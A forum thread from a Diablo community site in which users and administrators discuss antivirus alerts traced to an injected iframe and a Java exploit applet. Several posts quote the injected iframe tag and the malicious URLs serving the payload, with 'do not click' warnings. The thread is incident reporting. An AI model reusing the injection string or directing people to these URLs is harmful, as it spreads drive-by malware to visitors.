Latest Diablo 3 News
DiabloWiki Updates

Virus through site?

Discussion in 'Feedback, Suggestions & Support' started by pulli, Aug 29, 2012. | Replies: 58 | Views: 15957

  1. pulli

    pulli IncGamers Member

    Joined:
    Jun 21, 2009
    Messages:
    985
    Likes Received:
    1
    Trophy Points:
    256
    Hi there,

    Can it be that this site is infected with a small virus? My virus scanner seems to trigger on each page load - and I can also verify it manually. Each page load creates an executable local application datafolder; something like:
    with XXXXXX being random numbers. This executable immediatelly spawns a process & seems to try (though in a very crude way - virus scanners should immediatelly notify you) to the windows registry & startup data.

    I'm not really sure if it is the site - but I keep getting this file each pageload from the forums. And I tested it with other forums and I never get the virus there! The virus is identified with 'IDP.GenericN.5D5293F3'
  2. Dorjan

    Dorjan DiabloNut.Com

    Joined:
    Sep 6, 2010
    Messages:
    282
    Likes Received:
    0
    Trophy Points:
    57
    Hi there. The quantcast tag seemed to have been bringing in a java-app. It has been removed.

    We're investigating what the hell happened but it seems likely they were compromised at this time. We'll keep you informed.

    edit1:
    DO NOT GO TO THIS LINK
    http://www.opengl.org/cache/yCNrSgWJULcGEJJe.html
    DO NOT GO TO THIS LINK

    The link that was posted goes to opengl.org's cache service. This delivers some sort of exe that is run locally. I do not want to investigate the exe so I just terminated it and am now currently scanning my system to see if any damage was done. I'll let you know what you need to do (if anything).

    Hell this might be a false alarm. Lets hope!

    Still, this had nothing to do with our servers
  3. Elly

    Elly Administrator

    Joined:
    Feb 22, 1997
    Messages:
    4,452
    Likes Received:
    20
    Trophy Points:
    472
    It was a java script tag at quantcast (http://www.quantcast.com/) the site analytics people which was causing problems. Rush has removed it now as we don't use quantcast any more since moving to google. I don't know why it was causing a ding though.
  4. Siege Valgore

    Siege Valgore IncGamers Member

    Joined:
    Jul 12, 2011
    Messages:
    926
    Likes Received:
    0
    Trophy Points:
    166
    Smart move going with Google Analytics. They are and have been for some time now, the best.
  5. pulli

    pulli IncGamers Member

    Joined:
    Jun 21, 2009
    Messages:
    985
    Likes Received:
    1
    Trophy Points:
    256
    just to inform you: it is back (though now "idp.program." is the signature of the threat).
  6. VHD

    VHD IncGamers Member

    Joined:
    May 31, 2012
    Messages:
    134
    Likes Received:
    0
    Trophy Points:
    26
    Yep, I'm still getting alerts that Chrome needs to install a Java plugin.
  7. Diab

    Diab IncGamers Member

    Joined:
    Jun 22, 2003
    Messages:
    3,522
    Likes Received:
    0
    Trophy Points:
    256
  8. The Lord of Darkness

    The Lord of Darkness IncGamers Member

    Joined:
    Dec 13, 2008
    Messages:
    684
    Likes Received:
    0
    Trophy Points:
    165
    This happened to me twice a couple hours ago. What's the deal?
  9. The Lord of Darkness

    The Lord of Darkness IncGamers Member

    Joined:
    Dec 13, 2008
    Messages:
    684
    Likes Received:
    0
    Trophy Points:
    165
    Re: Virus through site?<iframe src=http://www.spiderwebforums.com/mlm/yahoo.html widt

    Do something about your damn site. My AV is going nuts when I visit this site.
  10. NBarnes

    NBarnes IncGamers Member

    Joined:
    Jul 10, 2005
    Messages:
    153
    Likes Received:
    0
    Trophy Points:
    86
    Re: Virus through site?<iframe src=http://www.spiderwebforums.com/mlm/yahoo.html widt

    Is this related to the <iframe src=http://www.spiderwebforums.com
    html that's being appended to everybody's forum posts?
  11. Varyafirion

    Varyafirion IncGamers Member

    Joined:
    Jul 12, 2005
    Messages:
    45
    Likes Received:
    0
    Trophy Points:
    5
    Re: Virus through site?<iframe src=http://www.spiderwebforums.com/mlm/yahoo.html widt

    The forum's definitely been messed with. The iframe seems to have been injected into everything (it's escaped in the posts themselves, but appears parsed elsewhere). It links to a java applet containing exploit code. I had virustotal check it out: https://www.virustotal.com/file/70b...7745406cce4cdb4898458aa3dd2ab5e5b8a/analysis/ . Looks like it's exploiting the "new" exploit in Java, so many people who don't have updated browser plugins are vulnerable to it. The forum needs to be taken offline imo.
  12. Diab

    Diab IncGamers Member

    Joined:
    Jun 22, 2003
    Messages:
    3,522
    Likes Received:
    0
    Trophy Points:
    256
    Re: Virus through site?<iframe src=http://www.spiderwebforums.com/mlm/yahoo.html widt

    Just got this again with the same java thing but with this new url:
    (do not click)
    h ttp://www.spiderwebforums.com/mlm/Orz.class
    (do not click)
  13. Rushster

    Rushster Administrator

    Joined:
    Jun 21, 2003
    Messages:
    756
    Likes Received:
    8
    Trophy Points:
    256
    There is a problem which we are working on now but it takes time to check everything. We are watching it very closely though and hopefully we'll have it fixed up shortly.
  14. krischan

    krischan Europe Trade Moderator

    Joined:
    Aug 17, 2003
    Messages:
    27,121
    Likes Received:
    47
    Trophy Points:
    351
    Every URL about a thread here had that iframe thingy. Maybe somebody wanted to draw the attention to spiderweb.com or launch a DoS attack on them... or just make that impression. Nothing is certain.

    Whatever, the issue seems to be solved now. Firefox still seems to report incgamers as an attacking site, however. It might need some time to get that changed back.

    Java is currntly switched off on my browser. Whatever might need it, it will currently not receive the 1001 blessings of my presence :smug:.
  15. morik

    morik IncGamers Member

    Joined:
    Nov 10, 2010
    Messages:
    77
    Likes Received:
    0
    Trophy Points:
    11
    Is there anything those of us who have been visiting the forums need to worry about? (In terms of having picked up any malware?)
  16. Rushster

    Rushster Administrator

    Joined:
    Jun 21, 2003
    Messages:
    756
    Likes Received:
    8
    Trophy Points:
    256
    Wanted to give everyone an update. We have been pouring over server logs and poking around the servers. I can say that the servers are all fine. However, after looking over the logs (which we are still doing) we think this is an intentional attack aimed at this community.

    If you are running any sort of virus protection then you will have been OK, same for Chrome users who got an alert bar at the top of the page. However, to be on the safe side I would advise anyone to give their machine a scan, always better to be safe than sorry.

    It is only these forums that have been affected, not the main Diablo site homepage or any other incgamers website.

    Our investigations are ongoing on this and we have got our co-location hosts involved as well as we are not happy about this attack which is obviously malicious aimed at this Diablo community.

    I will be updating this thread as I know more. As of writing this post, the site is clean, despite the google.FF warnings. These will dissappear when FF and Chrome get their act together and remove the warning. I do not know how long they take to update their records so you may get their alerts for a little while longer.
  17. snipeattacker

    snipeattacker IncGamers Member

    Joined:
    Aug 19, 2011
    Messages:
    173
    Likes Received:
    0
    Trophy Points:
    41
    i can now enter forums again without report from google that this is attack site... i have noscript enabled though to be sure. sorry i posted on main page earlier, but was only place safe to report it!
  18. Elly

    Elly Administrator

    Joined:
    Feb 22, 1997
    Messages:
    4,452
    Likes Received:
    20
    Trophy Points:
    472
    thanks for update. So google takes about 8 hours to update their records. Thought it would have been quicker.
  19. Varyafirion

    Varyafirion IncGamers Member

    Joined:
    Jul 12, 2005
    Messages:
    45
    Likes Received:
    0
    Trophy Points:
    5
    If it was an intentional, non-automated attack, then it wasn't very smart. Putting the iframe into posts which are very likely to be escaped. Also just as a note, it seems the navigation bar (e.g. Forum > Diablo: IncGamers, Diablo Wiki & DiabloNut.com >Feedback, Suggestions & Support >Virus through site?) did not look like it escaped html tags. You probably have enough on your plate as it is, just putting it out there :) Also, FF no longer blocks the forums. And any info on whether credentials were compromised will be nice too. Good luck!
  20. Rushster

    Rushster Administrator

    Joined:
    Jun 21, 2003
    Messages:
    756
    Likes Received:
    8
    Trophy Points:
    256
    Regarding credential, there is certainly no evidence of that from our log checking and scans.

    Just as another update, an external audit of the server is running at the moment which will also help us see what was up.

Share This Page